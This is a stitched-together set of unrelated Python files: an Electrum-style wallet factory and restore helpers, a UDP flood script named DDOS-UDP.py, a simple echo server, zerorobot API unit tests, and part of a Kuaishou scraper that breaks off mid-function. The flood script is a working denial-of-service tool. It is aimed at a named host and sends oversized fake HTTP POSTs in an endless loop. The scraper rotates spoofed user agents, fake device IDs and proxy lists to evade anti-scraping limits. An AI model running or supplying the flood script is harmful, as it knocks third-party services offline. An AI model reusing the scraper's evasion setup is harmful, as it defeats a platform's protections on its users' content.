def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
for name, keystore in self.keystores.items():
if keystore.can_change_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def has_seed(self):
return self.keystore.has_seed()
def can_change_password(self):
return self.keystore.can_change_password()
def is_watching_only(self):
return not any([not k.is_watching_only() for k in self.get_keystores()])
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'slp_standard', 'multisig', 'slp_multisig', 'imported', 'slp_imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'slp_standard': Slp_Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'slp_imported_privkey': Slp_ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
'slp_imported_addr': Slp_ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
# Convert legacy 'bip39-slp' and 'standard_slp' wallet types to 'slp_standard'
if storage.get('wallet_type', '') in ('bip39-slp', 'standard_slp'):
storage.put('wallet_type', 'slp_standard')
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
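# Illustrative sketch (not part of the original code): using the Wallet factory
# above with a WalletStorage instance. The path is a placeholder for an
# existing wallet file.
#
#   storage = WalletStorage("/path/to/existing/wallet_file")
#   wallet = Wallet(storage)   # returns e.g. Standard_Wallet, Multisig_Wallet, ...
#   print(type(wallet).__name__, wallet.wallet_type)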
def create_new_wallet(*, path, config, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
from .mnemonic import Mnemonic_Electrum, Mnemonic
if seed_type == 'electrum':
seed = Mnemonic_Electrum('en').make_seed()
else:
seed = Mnemonic('en').make_seed()
k = keystore.from_seed(seed, passphrase, seed_type = seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
storage.put('seed_type', seed_type)
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
elif keystore.is_private_key_list(text):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif keystore.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
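# Illustrative sketch (not part of the original code): restoring wallets from
# different kinds of text with the helper above. The paths, seed words and
# `config` object are placeholders.
#
#   d = restore_wallet_from_text("<12 or 24 seed words>", path="/tmp/restored_seed",
#                                config=config, password="secret")
#   d = restore_wallet_from_text("<address1> <address2>", path="/tmp/restored_watch",
#                                config=config)
#   wallet = d['wallet']
#   print(d['msg'])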
|
DDOS-UDP.py
|
import socket
import time
import threading
MAX_CONNECT = 200
PORT = 8088
HOST = "dc.qdzx.net"
PAGE = "/"
buf = ("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE, HOST))
buf = buf.encode()
socks = []
def conn_thread(MAX_CONN=MAX_CONNECT):
global socks
for i in range(0, MAX_CONN):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.sendto(buf, (HOST, PORT))
print("[+] Send buf OK!,conn=%d\n" % i)
socks.append(s)
except Exception as ex:
print("[-] Could not connect to server or send error:%s" % ex)
time.sleep(0)
def send_thread():
global socks
while True:
for s in socks:
try:
s.sendto(buf, (HOST, PORT))
print("[+] send OK! %s" % s)
except Exception as ex:
print("[-] send Exception:%s\n" % ex)
# socks.remove(s)
# s.close()
time.sleep(0)
# sys.exit(0)
def run(host=HOST, times=200, page=PAGE, port=PORT):
global buf, MAX_CONNECT, PORT, HOST, PAGE
MAX_CONNECT = times
PORT = port
HOST = host
PAGE = page
buf = ("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 1000000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE, HOST))
buf = buf.encode()
conn_th = threading.Thread(target=conn_thread, args=())
send_th = threading.Thread(target=send_thread, args=())
conn_th.start()
send_th.start()
if __name__ == "__main__":
run(HOST, 200)
|
multi_echo_server.py
|
import socket
import time
from multiprocessing import Process
HOST = ""
PORT = 8001
BUFFER_SIZE = 1024
def handle_echo(addr,conn):
print("Connected by",addr)
echo_data = conn.recv(BUFFER_SIZE)
time.sleep(0.5)
conn.sendall(echo_data)
conn.shutdown(socket.SHUT_RDWR)
conn.close()
def main():
with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
s.bind((HOST,PORT))
s.listen(10)
while True:
conn,addr = s.accept()
p = Process(target = handle_echo,args = (addr,conn))
p.daemon = True
p.start()
print("start processing",p)
if __name__ =="__main__":
main()
|
test_zrobot_api.py
|
import os
import shutil
import tempfile
import time
import unittest
import uuid
from multiprocessing import Process
import pytest
from jumpscale import j
from zerorobot import config
from zerorobot import service_collection as scol
from zerorobot import template_collection as tcol
from zerorobot.dsl.ZeroRobotAPI import TemplateNotFoundError, ZeroRobotAPI
from zerorobot.dsl.ZeroRobotManager import ServiceCreateError
from zerorobot.robot import Robot
from zerorobot.service_proxy import ServiceProxy
from zerorobot.template.base import TemplateBase
class TestZRobotAPI(unittest.TestCase):
def __init__(self, methodName='runTest'):
super().__init__(methodName=methodName)
self.api = None
def _start_robot(self, id, with_tmpl=False):
def new(id, with_tmpl):
robot = Robot()
robot.set_data_repo(j.sal.fs.getTmpDirPath())
if with_tmpl:
robot.add_template_repo('http://github.com/threefoldtech/0-robot', directory='tests/fixtures/templates')
listen = "localhost:660%d" % int(id)
addr = "http://%s" % listen
robot.start(listen=listen, testing=True)
# return robot
addr = "http://localhost:660%d" % int(id)
p = Process(target=new, args=(id, with_tmpl))
p.start()
return p, addr
def setUp(self):
self.previous_zrobot_cfgs = {}
for instance in j.clients.zrobot.list():
self.previous_zrobot_cfgs[instance] = j.clients.zrobot.get(instance)
j.clients.zrobot.reset()
self.api = ZeroRobotAPI()
self.ps = []
self.instances = []
# start 2 robots
for i in range(2):
p, addr = self._start_robot(i, with_tmpl=True)
self.ps.append(p)
instance = "robot%d" % int(i)
cl = j.clients.zrobot.get(instance, data={'url': addr}, create=True)
cl.config.save()
self.instances.append(instance)
# give the robots time to start. TODO: find something better than sleep
time.sleep(1)
# make sure we don't have any service loaded
scol.drop_all()
# make sure we don't have any template loaded
tcol._templates = {}
def tearDown(self):
for p in self.ps:
p.terminate()
p.join()
for instance in self.instances:
j.clients.zrobot.delete(instance)
# TODO: cleanup data_dir of each robots
# make sure we don't have any service loaded
scol.drop_all()
# make sure we don't have any template loaded
tcol._templates = {}
# restore zrobot config
for instance, cl in self.previous_zrobot_cfgs.items():
cl = j.clients.zrobot.get(instance, data=cl.config.data, create=True)
cl.config.save()
def test_robots_discovery(self):
self.assertGreaterEqual(len(self.api.robots.list()), 2, "should have discovered at least the 2 robots that are running for the test")
for instance in self.instances:
self.assertIn(instance, self.api.robots.list())
def test_service_create_uid(self):
# make sure we don't have any template loaded in the current process
tcol._templates = {}
with self.assertRaises(TemplateNotFoundError, msg='creating a service from an unhandled template should raise'):
self.api.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node1')
# load template in current process
with tempfile.TemporaryDirectory(prefix="robotlocal") as tmpdir:
config.data_repo = config.DataRepo(tmpdir)
tcol.add_repo('http://github.com/threefoldtech/0-robot', directory='tests/fixtures/templates')
# now that we have some templates loaded, it should create a local service
node2 = self.api.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node2')
self.assertTrue(isinstance(node2, TemplateBase))
# the api should get all services from the local robot only
self.assertEqual(len(self.api.services.names), 1)
self.assertEqual(len(self.api.services.guids), 1)
# make sure remote robot doesn't have service created on them
for instance in self.api.robots.list():
robot = self.api.robots.get(instance)
self.assertEqual(len(robot.services.names), 0)
robot = self.api.robots.get('robot1')
node = robot.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node3')
self.assertEqual(type(node), ServiceProxy, "service create on remote robot should return ServiceProxy")
self.assertEqual(len(robot.services.guids), 1)
# ensure we can access the remote service from the robot object
assert robot.services.names[node.name]
assert robot.services.guids[node.guid]
def test_service_create_name(self):
# make sure we don't have any template loaded in the current process
tcol._templates = {}
with self.assertRaises(TemplateNotFoundError, msg='creating a service from an unhandled template should raise'):
self.api.services.create("node", 'node1')
# load template in current process
with tempfile.TemporaryDirectory(prefix="robotlocal") as tmpdir:
config.data_repo = config.DataRepo(tmpdir)
tcol.add_repo('http://github.com/threefoldtech/0-robot', directory='tests/fixtures/templates')
# now that we have some templates loaded, it should create a local service
node2 = self.api.services.create("node", 'node2')
self.assertTrue(isinstance(node2, TemplateBase))
# the api should get all services from the local robot only
self.assertEqual(len(self.api.services.names), 1)
self.assertEqual(len(self.api.services.guids), 1)
# make sure remote robot doesn't have service created on them
for instance in self.api.robots.list():
robot = self.api.robots.get(instance)
self.assertEqual(len(robot.services.names), 0)
robot = self.api.robots.get('robot1')
node = robot.services.create("node", 'node3')
self.assertEqual(type(node), ServiceProxy, "service create on remote robot should return ServiceProxy")
self.assertEqual(len(robot.services.guids), 1)
# ensure we can access the remote service from the robot object
assert robot.services.names[node.name]
assert robot.services.guids[node.guid]
def test_service_create_validate_fail(self):
# make sure we don't have any template loaded in the current process
tcol._templates = {}
with self.assertRaises(TemplateNotFoundError, msg='creating a service from an unhandled template should raise'):
self.api.services.create("validate", 'service1')
# load template in current process
with tempfile.TemporaryDirectory(prefix="robotlocal") as tmpdir:
config.data_repo = config.DataRepo(tmpdir)
tcol.add_repo('http://github.com/threefoldtech/0-robot', directory='tests/fixtures/templates')
# try to create a service with wrong data, it should raise
robot = self.api.robots.get('robot1')
with pytest.raises(ServiceCreateError):
service = robot.services.create("validate", 'service1')
# create the same service with valid data, it should succeed
assert len(robot.services.find()) == 0
service = robot.services.create("validate", 'service1', {'required': True})
assert len(robot.services.find()) == 1
def test_service_search(self):
# load template in current process
with self.subTest(name='local'):
with tempfile.TemporaryDirectory(prefix="robotlocal") as tmpdir:
config.data_repo = config.DataRepo(tmpdir)
tcol.add_repo('http://github.com/threefoldtech/0-robot', directory='tests/fixtures/templates')
robot = self.api
self._test_search(self.api)
with self.subTest(name='remote'):
self._test_search(self.api.robots.get('robot1'))
def test_service_exists(self):
# load template in current process
with self.subTest(name='local'):
with tempfile.TemporaryDirectory(prefix="robotlocal") as tmpdir:
config.data_repo = config.DataRepo(tmpdir)
tcol.add_repo('http://github.com/threefoldtech/0-robot', directory='tests/fixtures/templates')
self._test_exists(self.api)
with self.subTest(name='remote'):
self._test_exists(self.api.robots.get('robot1'))
def test_service_get(self):
with self.subTest(name='local'):
# load template in current process
with tempfile.TemporaryDirectory(prefix="robotlocal") as tmpdir:
config.data_repo = config.DataRepo(tmpdir)
tcol.add_repo('http://github.com/threefoldtech/0-robot', directory='tests/fixtures/templates')
self._test_get(self.api)
with self.subTest(name='remote'):
self._test_get(self.api.robots.get('robot1'))
def test_service_find_or_create(self):
with self.subTest(name='local'):
# load template in current process
with tempfile.TemporaryDirectory(prefix="robotlocal") as tmpdir:
config.data_repo = config.DataRepo(tmpdir)
tcol.add_repo('http://github.com/threefoldtech/0-robot', directory='tests/fixtures/templates')
self._test_find_or_create(self.api)
with self.subTest(name='remote'):
self._test_find_or_create(self.api.robots.get('robot1'))
def _test_get(self, robot):
node1 = robot.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node1')
node2 = robot.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node2')
vm1 = robot.services.create("github.com/threefoldtech/0-robot/vm/0.0.1", 'vm1')
self.assertEqual(node1.guid, robot.services.get(name='node1').guid)
self.assertEqual(node2.guid, robot.services.get(name='node2').guid)
self.assertEqual(vm1.guid, robot.services.get(name='vm1').guid)
self.assertEqual(vm1.guid, robot.services.get(template_uid='github.com/threefoldtech/0-robot/vm/0.0.1').guid)
with self.assertRaises(scol.TooManyResults):
robot.services.get(template_host='github.com')
with self.assertRaises(scol.TooManyResults):
robot.services.get(template_account='threefoldtech')
with self.assertRaises(scol.TooManyResults):
robot.services.get(template_repo='0-robot')
with self.assertRaises(scol.TooManyResults):
robot.services.get(template_name='node')
with self.assertRaises(scol.TooManyResults):
robot.services.get(template_version='0.0.1')
with self.assertRaises(scol.ServiceNotFoundError):
self.assertFalse(robot.services.get(name='nan'))
with self.assertRaises(scol.ServiceNotFoundError):
self.assertFalse(robot.services.get(template_uid='github.com/threefoldtech/0-robot/node/1.1.0'))
with self.assertRaises(scol.ServiceNotFoundError):
self.assertFalse(robot.services.get(template_name='other'))
def _test_exists(self, robot):
node1 = robot.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node1')
node2 = robot.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node2')
vm1 = robot.services.create("github.com/threefoldtech/0-robot/vm/0.0.1", 'vm1')
self.assertTrue(robot.services.exists(name='node1'))
self.assertTrue(robot.services.exists(name='node2'))
self.assertTrue(robot.services.exists(name='vm1'))
self.assertTrue(robot.services.exists(template_uid='github.com/threefoldtech/0-robot/node/0.0.1'))
self.assertTrue(robot.services.exists(template_host='github.com'))
self.assertTrue(robot.services.exists(template_account='threefoldtech'))
self.assertTrue(robot.services.exists(template_repo='0-robot'))
self.assertTrue(robot.services.exists(template_name='node'))
self.assertTrue(robot.services.exists(template_version='0.0.1'))
self.assertFalse(robot.services.exists(name='nan'))
self.assertFalse(robot.services.exists(template_uid='github.com/threefoldtech/0-robot/node/1.1.0'))
self.assertFalse(robot.services.exists(template_name='other'))
def _test_search(self, robot):
node1 = robot.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node1')
node2 = robot.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node2')
vm1 = robot.services.create("github.com/threefoldtech/0-robot/vm/0.0.1", 'vm1')
results = robot.services.find(template_uid="github.com/threefoldtech/0-robot/node/0.0.1")
self.assertEqual(len(results), 2)
guids = [node1.guid, node2.guid]
for s in results:
self.assertIn(s.guid, guids)
results = robot.services.find(name='node1')
self.assertEqual(len(results), 1)
self.assertEqual(results[0].guid, node1.guid)
results = robot.services.find(template_version='0.0.1', template_name='node')
self.assertEqual(len(results), 2)
guids = [node1.guid, node2.guid]
for s in results:
self.assertIn(s.guid, guids)
def _test_find_or_create(self, robot):
node1 = robot.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node1')
assert len(robot.services.guids) == 1
srv = robot.services.find_or_create(template_uid="github.com/threefoldtech/0-robot/node/0.0.1", service_name='node1', data={})
assert node1.guid == srv.guid, "find or create should return service if it exists"
assert len(robot.services.guids) == 1
srv = robot.services.find_or_create(template_uid="github.com/threefoldtech/0-robot/node/0.0.1", service_name='node2', data={})
assert node1.guid != srv.guid, "find or create should create a service if it doesn't exists"
assert len(robot.services.guids) == 2
|
KS_demo_4.0.py
|
import os
import re
import sys
import json
import time
import random
import requests
import threading
from queue import Queue
from PyQt5.QtWidgets import (QWidget, QLineEdit,QPushButton,QProgressBar,
QTextEdit, QGridLayout, QApplication)
from PyQt5.QtCore import QCoreApplication,pyqtSignal, QThread
cookie = ''
UA_WEB_LIST = [
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5"
]
UA_AND_LIST = [
"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Mobile Safari/537.36",
"Mozilla/5.0 (Linux; U; Android 7.1.1_r58; zh-cn; MI 6 Build/XPGCG5c067mKE4bJT2oz99wP491yRmlkbGVY2pJ8kELwnF9lCktxB2baBUrl3zdK) AppleWebKit/537.36 (KHTML, like Gecko)Version/4.0 MQQBrowser/9.9 Mobile Safari/537.36",
"Mozilla/5.0 (Linux; U; Android 7.1.1_r58; zh-cn; R7Plusm Build/hccRQFbhDEraf5B4M760xBeyYwaxH0NjeMsOymkoLnr31TcAhlqfd2Gl8XGdsknO) AppleWebKit/537.36 (KHTML, like Gecko)Version/4.0 MQQBrowser/9.9 Mobile Safari/537.36",
"Mozilla/5.0 (Linux; Android 9; BLA-AL00 Build/HUAWEIBLA-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.89 Mobile Safari/537.36 T7/11.19 SP-engine/2.15.0 baiduboxapp/11.19.5.10 (Baidu; P1 9)",
"Mozilla/5.0 (Linux; U; Android 8.1.0; zh-cn; BLA-AL00 Build/HUAWEIBLA-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/8.9 Mobile Safari/537.36",
"Mozilla/5.0 (Linux; U; Android 7.1.2; zh-cn; Redmi 5 Plus Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/11.7.34",
]
DID_WEB_LIST = [
'web_f59491427f0ea183ee1975de99ae1718',
# 'web_ce554296508e5eac12616081c75f8a27',
# 'web_027b3637f2aef14cbd14bbf93f50bd4a'
]
DID_AND_LIST = [
'ANDROID_e0e0ef947bbbc243',
'ANDROID_1dfef527abefe8c7',
'ANDROID_5518a3747864010b',
'ANDROID_25c32123fd766e1e',
'ANDROID_600b23d707697df0',
'ANDROID_e1b34c4ac9ddf120',
'ANDROID_773c33a642ac1845',
'ANDROID_6a615c268d9dc8d3',
'ANDROID_c45e742737e83499',
'ANDROID_c94d28153912d19a',
'ANDROID_9ba4839bf09a1834',
'ANDROID_066f7438a673e208'
]
IP_LIST = [
{"ip": "222.85.28.130", "port": "52590", "type": "HTTP"},
{"ip": "223.199.27.86", "port": "9999", "type": "HTTP"},
{"ip": "36.248.132.198", "port": "9999", "type": "HTTP"},
{"ip": "175.42.123.196", "port": "9999", "type": "HTTP"},
{"ip": "113.195.168.32", "port": "9999", "type": "HTTP"},
{"ip": "119.108.165.153", "port": "9000", "type": "HTTP"},
{"ip": "175.42.158.224", "port": "9999", "type": "HTTP"},
{"ip": "125.108.114.170", "port": "9000", "type": "HTTP"},
{"ip": "171.35.169.101", "port": "9999", "type": "HTTP"},
{"ip": "180.118.128.55", "port": "9000", "type": "HTTP"},
{"ip": "125.108.79.254", "port": "9000", "type": "HTTP"},
{"ip": "113.194.130.100", "port": "9999", "type": "HTTP"},
{"ip": "110.243.27.195", "port": "9999", "type": "HTTP"},
{"ip": "115.218.214.35", "port": "9000", "type": "HTTP"},
{"ip": "125.123.152.114", "port": "3000", "type": "HTTP"},
{"ip": "61.164.39.66", "port": "53281", "type": "HTTP"},
{"ip": "123.55.98.144", "port": "9999", "type": "HTTP"},
{"ip": "122.138.141.174", "port": "9999", "type": "HTTP"},
{"ip": "119.254.94.93", "port": "44665", "type": "HTTP"},
{"ip": "123.163.27.226", "port": "9999", "type": "HTTP"},
{"ip": "171.35.170.105", "port": "9999", "type": "HTTP"},
{"ip": "136.228.128.6", "port": "43117", "type": "HTTP"},
{"ip": "36.249.48.23", "port": "9999", "type": "HTTP"},
{"ip": "113.195.21.9", "port": "9999", "type": "HTTP"},
{"ip": "125.108.73.239", "port": "9000", "type": "HTTP"},
{"ip": "120.83.107.11", "port": "9999", "type": "HTTP"},
{"ip": "175.43.156.39", "port": "9999", "type": "HTTP"},
{"ip": "220.249.149.68", "port": "9999", "type": "HTTP"},
{"ip": "113.195.18.104", "port": "9999", "type": "HTTP"},
{"ip": "163.125.30.227", "port": "8118", "type": "HTTP"}
]
PROFILE_URL = "https://live.kuaishou.com/profile/"
DATA_URL = "https://live.kuaishou.com/m_graphql"
WORK_URL = "https://m.gifshow.com/fw/photo/"
USER_ITEM = {}
# Background crawler
class spider_ks():
__headers_web = {
'accept': '*/*',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
'Connection': 'keep-alive',
'Content-Type': 'application/json',
'Host': 'live.kuaishou.com',
'Origin': 'https://live.kuaishou.com',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'User-Agent': '',
'Cookie': ''
}
__headers_and = {
'User-Agent': '',
'cookie': ''
}
__crawl_list = []
def __init__(self,satar_url,cookie):
self.__cookie = cookie
self.satar_url = ''.join(satar_url.split('\n')).strip()
self.user_id = None
self.__crawl_list.append(self.satar_url)
self.q_works = Queue()
# 1. Crawl entry point
def spider_start(self):
print("准备开始爬取,共有%d个用户..." % len(self.__crawl_list))
for surl in self.__crawl_list:
self.get_user(surl)
return True
# 2. Fetch the user's profile info and list of works
def get_user(self, surl):
proxy_ = random.choice(IP_LIST)
proxies = {'{}'.format(proxy_['type']): '{0}:{1}'.format(proxy_['ip'], proxy_['port'])}
self.__headers_web['User-Agent'] = random.choice(UA_WEB_LIST)
self.__headers_web['Cookie'] = 'did=' + random.choice(DID_WEB_LIST)
response = requests.get(surl)
if '/profile/' not in response.request.url:
uid = response.request.url.split('?')[0].split('/')[-2]
vid = response.request.url.split('?')[0].split('/')[-1]
dir_name = './data/'
if not os.path.exists(dir_name):
os.makedirs(dir_name)
self.get_video_url(uid,vid,dir_name)
return
uid = response.request.url.split('/profile/')[-1].split('?')[0]
self.user_id = uid
# Fetch the user's profile information
payload = {"operationName": "privateFeedsQuery",
"variables": {"principalId": uid, "pcursor": "", "count": 999},
"query": "query privateFeedsQuery($principalId: String, $pcursor: String, $count: Int) {\n privateFeeds(principalId: $principalId, pcursor: $pcursor, count: $count) {\n pcursor\n list {\n id\n thumbnailUrl\n poster\n workType\n type\n useVideoPlayer\n imgUrls\n imgSizes\n magicFace\n musicName\n caption\n location\n liked\n onlyFollowerCanComment\n relativeHeight\n timestamp\n width\n height\n counts {\n displayView\n displayLike\n displayComment\n __typename\n }\n user {\n id\n eid\n name\n avatar\n __typename\n }\n expTag\n __typename\n }\n __typename\n }\n}\n"}
resp = requests.post(DATA_URL, headers=self.__headers_web, json=payload,
# proxies=proxies
)
resp.raise_for_status()
work_list = json.loads(resp.content.decode(encoding='utf-8', errors='strict'))['data']['privateFeeds']['list']
# Guard against the user being live: the first item then defaults to the live stream, whose info fields are None, so drop it
if work_list[0]['id'] is None:
work_list.pop(0)
nickname = re.sub(r'[\\/:*?"<>|\r\n]+', "", work_list[0]['user']['name'])
# Start another thread to fetch and save the user's profile information
t = threading.Thread(target=self.get_user_info, args=(uid, work_list,nickname))
t.start()
# Build a folder named nickname(user id)
dir_name = "data/" + nickname + "(" + uid + ")/"
if not os.path.exists(dir_name):
os.makedirs(dir_name)
print("开始爬取用户 " + nickname + ",保存在目录 " + dir_name)
print(" 共有" + str(len(work_list)) + "个作品")
for i in range(len(work_list)):
self.q_works.put([dir_name, work_list[i], i + 1])
t_list = []
for i in range(50):
t = threading.Thread(target=self.get_works)
t.start()
t_list.append(t)
for t in t_list:
t.join()
print("用户 " + nickname + "爬取完成!")
# 3. Fetch work information
def get_works(self):
while True:
if self.q_works.qsize() != 0:
dir_name, work, wk_index = self.q_works.get()
w_type = work['workType']
w_caption = re.sub(r"\s+", " ", work['caption'])
w_name = re.sub(r'[\\/:*?"<>|\r\n]+', "", w_caption)[0:24]
w_time = time.strftime('%Y-%m-%d', time.localtime(work['timestamp'] / 1000))
w_index = ""
if w_type == 'vertical' or w_type == 'multiple' or w_type == "single" or w_type == 'ksong':
# Download the image set
w_urls = work['imgUrls']
l = len(w_urls)
print(" " + str(wk_index) + ")图集作品:" + w_caption + "," + "共有" + str(l) + "张图片")
for i in range(l):
p_name = w_time + w_index + "_" + w_name + "_" + str(i + 1) + '.jpg'
pic = dir_name + p_name
if not os.path.exists(pic):
proxy_ = random.choice(IP_LIST)
proxies = {'{}'.format(proxy_['type']): '{0}:{1}'.format(proxy_['ip'], proxy_['port'])}
r = requests.get(w_urls[i].replace("webp", "jpg"),
# proxies=proxies
)
r.raise_for_status()
with open(pic, "wb") as f:
f.write(r.content)
print(" " + str(i + 1) + "/" + str(l) + " 图片 " + p_name + " 下载成功 √")
else:
print(" " + str(i + 1) + "/" + str(l) + " 图片 " + p_name + " 已存在 √")
elif w_type == 'video':
# Download the video work
vid = work['id']
uid = self.user_id
self.get_video_url(uid, vid, dir_name,nums=True)
try:
print(" " + str(wk_index) + ")视频作品:" + w_caption + " 下载成功 √")
except:
print(" 这里似乎有点小错误,已跳过")
else:
print("错误的类型")
self.q_works.task_done()
else:
return
# 5. Resolve the video link and download it
def get_video_url(self,uid,vid,dir_name,nums=False):
# print(uid,vid,dir_name)
proxy_ = random.choice(IP_LIST)
proxies = {'{}'.format(proxy_['type']): '{0}:{1}'.format(proxy_['ip'], proxy_['port'])}
self.__headers_and['User-Agent'] = random.choice(UA_AND_LIST)
did = random.choice(DID_AND_LIST)
try:
# Watermark-free download link
# self.__headers_and['Cookie'] = 'did=' + did
self.__headers_and['Cookie'] = re.sub('did=.*?;', 'did=' + did + ';', self.__cookie)
video_url = WORK_URL + vid
resp = requests.get(video_url, headers=self.__headers_and, params={"did": did},timeout=20
# proxies=proxies
)
resp.raise_for_status()
html = resp.text
pattern = '"srcNoMark":"(https:.*?).mp4'
'''Watermark-free example: https://txmov2.a.yximgs.com/upic/2020/09/01/11/BMjAyMDA5MDExMTE3MThfMTM1Njk3NTc3OV8zNTM2NjQ2OTUxNF8wXzM=_b_Be53756194a8110de7e2153cfef04f7b0.mp4'''
playUrl = re.search(pattern, html).group(1) + ".mp4"
if not nums:
video_info = {}
try:
video_info['作者'] = re.search('<div class="auth-name">(.*?)</div>', html).group(1)
